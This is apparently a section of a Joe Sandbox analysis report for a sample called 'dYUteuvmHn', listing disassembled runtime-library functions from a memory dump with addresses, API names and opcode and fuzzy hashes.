                                                                                                                                Function 00007FF712789A0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID: ACP$OCP
                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                • Opcode ID: 7f30fb09b69d25d80df610dc42c677b4d0e608a82631f03b09630da2202ead5f
                                                                                                                                • Instruction ID: 80f2768ef849c09d42a429e963fa68ed723049332e8182ffd7f9bd0d7a9223c5
                                                                                                                                • Opcode Fuzzy Hash: 7f30fb09b69d25d80df610dc42c677b4d0e608a82631f03b09630da2202ead5f
                                                                                                                                • Instruction Fuzzy Hash: CC119321A1CA43D3F654AB12A44257BA3A0BF4E7A4F905431EB4A43744DFBCE90DC765
                                                                                                                                Function 00007FF712785E64 Relevance: 7.8, APIs: 5, Instructions: 286COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                • Opcode ID: 8e1a088be03459684d0f0f3b5b9979803e187604e760a331b36d960168fcf845
                                                                                                                                • Instruction ID: c00c45f19d769c42ad325602c09e540519a0e6703f44dafee5309c7f5c3a1e6c
                                                                                                                                • Opcode Fuzzy Hash: 8e1a088be03459684d0f0f3b5b9979803e187604e760a331b36d960168fcf845
                                                                                                                                • Instruction Fuzzy Hash: 98B1D622B18E4255EA60BB21A8025BBE351EB4ABF4F844131EB4D47B85DFBCE44DC310
                                                                                                                                Function 00007FF71276D1B0 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 706COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0$nan
                                                                                                                                • API String ID: 0-3707144033
                                                                                                                                • Opcode ID: 4b45e8a6c8fc4174b96e92b2f6d83c7ba88e91b89e811e88f7c488d3e01b1d85
                                                                                                                                • Instruction ID: ec35c0a5bf259a26ffed0878fd91ba1cd254de1a2a288ccebe1dcc8667fbffa8
                                                                                                                                • Opcode Fuzzy Hash: 4b45e8a6c8fc4174b96e92b2f6d83c7ba88e91b89e811e88f7c488d3e01b1d85
                                                                                                                                • Instruction Fuzzy Hash: 6162D573618F8585EB159F25D4402AEB7B0FB8ABA8F848132DB4D03B59DF78D498C314
                                                                                                                                Function 00007FF7127742F0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                • Opcode ID: fa008ab895573d51d9081d887bb3cab71e3d139b52afd8f7115241f48b5f998f
                                                                                                                                • Instruction ID: 07b7e4f365b07bd8cea459c329dd159d77eac3e5d651c5bb6e6d92a3b1fa8656
                                                                                                                                • Opcode Fuzzy Hash: fa008ab895573d51d9081d887bb3cab71e3d139b52afd8f7115241f48b5f998f
                                                                                                                                • Instruction Fuzzy Hash: 23110D22B14F058AEB009B60EC552A973A4FB59768F440E31EA6D46794EF78D598C350
                                                                                                                                Function 00007FF71276DBF0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 539COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: nan
                                                                                                                                • API String ID: 0-1810114945
                                                                                                                                • Opcode ID: e8502167176aeb9d0e248a3ec3a0e9207b2ab05224c00187d2013f3dcd0dd0e9
                                                                                                                                • Instruction ID: b122d1b372b79515d88ccb2181f2b24af2e4e7f65f76b9d8180f92bc3bb57f1d
                                                                                                                                • Opcode Fuzzy Hash: e8502167176aeb9d0e248a3ec3a0e9207b2ab05224c00187d2013f3dcd0dd0e9
                                                                                                                                • Instruction Fuzzy Hash: AA22F672A08F818AFB119F25D4406AEB7A1FB5A7A8F944532EB4D03B95DF78D48CC314
                                                                                                                                Function 00007FF712789670 Relevance: 4.7, APIs: 3, Instructions: 165COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale$_invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4006003004-0
                                                                                                                                • Opcode ID: 7a38986db6fc031485005f62dd7922395e7b5c1424c95a463608234a198f8097
                                                                                                                                • Instruction ID: 8bad10935e61e98e579b3a5a812652993990b06a7c6579602ab4abe9691335db
                                                                                                                                • Opcode Fuzzy Hash: 7a38986db6fc031485005f62dd7922395e7b5c1424c95a463608234a198f8097
                                                                                                                                • Instruction Fuzzy Hash: C961A032A08943CAEB24AF11D5422BAB3A1FB5A764F808135DB4E93791DFBCE45CC750
                                                                                                                                Function 00007FF712781C04 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID: GetLocaleInfoEx
                                                                                                                                • API String ID: 2299586839-2904428671
                                                                                                                                • Opcode ID: a11cda160de3fbeb58fa447cb76b87f3312b811022d96cfed9964278e2c032ef
                                                                                                                                • Instruction ID: 35bc724faab489f2b6d861c5531bfe56ef8e3cf7b5c973d741c77ef4de86cb6f
                                                                                                                                • Opcode Fuzzy Hash: a11cda160de3fbeb58fa447cb76b87f3312b811022d96cfed9964278e2c032ef
                                                                                                                                • Instruction Fuzzy Hash: 60015E20B08F8285EA44AB16B4414A6E750AF4EBF4F984535EF2C537E5DEACD40DC350
                                                                                                                                Function 00007FF71276A2C0 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00007FF71276A4C5
                                                                                                                                • 00000000, xrefs: 00007FF71276A4BB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 00000000$00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
                                                                                                                                • API String ID: 0-756571863
                                                                                                                                • Opcode ID: 3fc68c8767bf21b719d89b2e29557f87ec27f29f12cf8b11f6c0bd073e871569
                                                                                                                                • Instruction ID: ea44f47930c93f36ec0e9080e6203e8e04ffd828251593ceea6ffd55d633adbc
                                                                                                                                • Opcode Fuzzy Hash: 3fc68c8767bf21b719d89b2e29557f87ec27f29f12cf8b11f6c0bd073e871569
                                                                                                                                • Instruction Fuzzy Hash: A3616932B28B8183F718AF2A985837AAA54F74A350FD09231DF4E87B81DA3DD44DC714
                                                                                                                                Function 00007FF7127620E0 Relevance: 1.9, Strings: 1, Instructions: 652COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: gfff
                                                                                                                                • API String ID: 0-1553575800
                                                                                                                                • Opcode ID: 311103c466259598d15c6ab42dcb7f8e48c0ec25a9ef83c99be89551d795f701
                                                                                                                                • Instruction ID: b772c4da2e70c3fa368dea11105adf85ea35a296b89c471a05b7ef469ae01b5c
                                                                                                                                • Opcode Fuzzy Hash: 311103c466259598d15c6ab42dcb7f8e48c0ec25a9ef83c99be89551d795f701
                                                                                                                                • Instruction Fuzzy Hash: EA325A22F0CB5686FB649B19D44077BAA91FB997A4F804135DF4E43B90DABCE84CCB14
                                                                                                                                Function 00007FF71277B90C Relevance: 1.9, APIs: 1, Instructions: 373COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Info
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1807457897-0
                                                                                                                                • Opcode ID: 8d8b5ed0044e1c80fcd8a2f7cac99818e3aa7f5b0db7af0cbf2e340829000d2d
                                                                                                                                • Instruction ID: 13adb5b4f53acc98b9ee387f5a4205b5514a6e3cb56d031f9a4f5d928872d003
                                                                                                                                • Opcode Fuzzy Hash: 8d8b5ed0044e1c80fcd8a2f7cac99818e3aa7f5b0db7af0cbf2e340829000d2d
                                                                                                                                • Instruction Fuzzy Hash: 6302C262A08BC186E751EF3894052FAB3A0FB5D758F459235DB9C83652EFB8E1D9C700
                                                                                                                                Function 00007FF7127876B0 Relevance: 1.8, APIs: 1, Instructions: 337COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 598155a237e32eec71d3bb396a7777a91ff0ea15de214cea95127934fa5f15fb
                                                                                                                                • Instruction ID: b6aaca41af66e7a4bcf88802992d6ab753d8debbef990b2f86574cad962f4fd4
                                                                                                                                • Opcode Fuzzy Hash: 598155a237e32eec71d3bb396a7777a91ff0ea15de214cea95127934fa5f15fb
                                                                                                                                • Instruction Fuzzy Hash: 72E1A136A04F8186EB20EB61E4412EFA7A0F75A798F404535DB8E53B56EFB8D25DC310
                                                                                                                                Function 00007FF71276A9B0 Relevance: 1.7, Strings: 1, Instructions: 440COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: gfff
                                                                                                                                • API String ID: 0-1553575800
                                                                                                                                • Opcode ID: 4bf74b520eea0981e85a8c0abaa36720e06e0e4a8230af0d778ae5f19d1e8835
                                                                                                                                • Instruction ID: 22f8090d32190373c73b5ce081c829f707c7f04d1e79ef5c0967b939106c84e5
                                                                                                                                • Opcode Fuzzy Hash: 4bf74b520eea0981e85a8c0abaa36720e06e0e4a8230af0d778ae5f19d1e8835
                                                                                                                                • Instruction Fuzzy Hash: CFF1AD2262C98781F719BE2AD50473DA596BB0A790F904136EF0F877D0EA7CD94CC329
                                                                                                                                Function 00007FF7127898B4 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                • Opcode ID: fe6c233ec407f51dd639e5eed2527f43fbd28c06470b297cc667474d11f2b2b8
                                                                                                                                • Instruction ID: 06c9be1df1c5d701afcc330db13c5d3a3bf0e48388e8e9651b11ce588e50a713
                                                                                                                                • Opcode Fuzzy Hash: fe6c233ec407f51dd639e5eed2527f43fbd28c06470b297cc667474d11f2b2b8
                                                                                                                                • Instruction Fuzzy Hash: B7318171A08A8286EB24AB21D4423ABE390FB8E794F808039DB5D83745DF7CE40CC750
                                                                                                                                Function 00007FF712789508 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF712789D09,?,00000000,00000092,?,?,00000000,?,00007FF71277D997), ref: 00007FF7127895A6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                • Opcode ID: 7b2f86bd01da2671e598cf7de0c50b076a47399d5def4b946fb1e618c78055b4
                                                                                                                                • Instruction ID: bd08a7f863eb2600dea430a4d125a9a2a82fa850ee7038b30504ae5a9d0c9350
                                                                                                                                • Opcode Fuzzy Hash: 7b2f86bd01da2671e598cf7de0c50b076a47399d5def4b946fb1e618c78055b4
                                                                                                                                • Instruction Fuzzy Hash: 8311D563A08A45CAEB14AF25D0412BAB7E0EB49BB0F844135D729433D0CEB8D6DDC750
                                                                                                                                Function 00007FF712789AC0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                • Opcode ID: 7e6ef516c50e4812878c70b9499ea16e37233f3fe449cdf3471de64741bd2c35
                                                                                                                                • Instruction ID: 9363c9ff1ab9eae922949d8e4d204dfe5da51d500263a00b628afa074a3daa06
                                                                                                                                • Opcode Fuzzy Hash: 7e6ef516c50e4812878c70b9499ea16e37233f3fe449cdf3471de64741bd2c35
                                                                                                                                • Instruction Fuzzy Hash: AA113632A18A52C6E760AF2690411BABAA1E78AB74F844135D72D433C4CFB8E88DC304
                                                                                                                                Function 00007FF7127895D8 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF712789CC4,?,00000000,00000092,?,?,00000000,?,00007FF71277D997), ref: 00007FF712789656
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                • Opcode ID: 21b7764c058d3fcdd1d190dc1e181589345b1f725112053916730720054898cf
                                                                                                                                • Instruction ID: 31fcdb5fb70efe617ac9e955c4b4541b7b280c2316596c13cdbb15827d7d844b
                                                                                                                                • Opcode Fuzzy Hash: 21b7764c058d3fcdd1d190dc1e181589345b1f725112053916730720054898cf
                                                                                                                                • Instruction Fuzzy Hash: 92019662F0858286E7146B25E54177AB6E1EB4A7B4F858231D729473C4DFA8948CC710
                                                                                                                                Function 00007FF712781890 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF712781BC8,?,?,?,?,?,?,?,?,00000000,00007FF712788B38), ref: 00007FF7127818C6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                • Opcode ID: 4b59560eca301c954c9f8305ad21876d12b854827a016a629bfbdda0ba5ad023
                                                                                                                                • Instruction ID: 2090d6211fa1767275319e1878f1b8fb452d0593870cc75866ecd9176a6e8945
                                                                                                                                • Opcode Fuzzy Hash: 4b59560eca301c954c9f8305ad21876d12b854827a016a629bfbdda0ba5ad023
                                                                                                                                • Instruction Fuzzy Hash: 15F05E32B08E0582E700AB61F88577BB3A5EBA87A0F948030D75D43365CF7CD4A8C740
                                                                                                                                Function 00007FF7127847D0 Relevance: 1.4, APIs: 1, Instructions: 137COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetLastError.KERNEL32 ref: 00007FF712784875
                                                                                                                                  • Part of subcall function 00007FF7127803C0: HeapAlloc.KERNEL32(?,?,00000000,00007FF71277FEA7), ref: 00007FF712780415
                                                                                                                                  • Part of subcall function 00007FF712781270: HeapFree.KERNEL32(?,?,00007FF71277EB93,00007FF712787F3E,?,?,?,00007FF7127882BB,?,?,00000000,00007FF712788835,?,?,?,00007FF712788767), ref: 00007FF712781286
                                                                                                                                  • Part of subcall function 00007FF712781270: GetLastError.KERNEL32(?,?,00007FF71277EB93,00007FF712787F3E,?,?,?,00007FF7127882BB,?,?,00000000,00007FF712788835,?,?,?,00007FF712788767), ref: 00007FF712781290
                                                                                                                                  • Part of subcall function 00007FF71278B034: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71278B067
                                                                                                                                Memory Dump Source
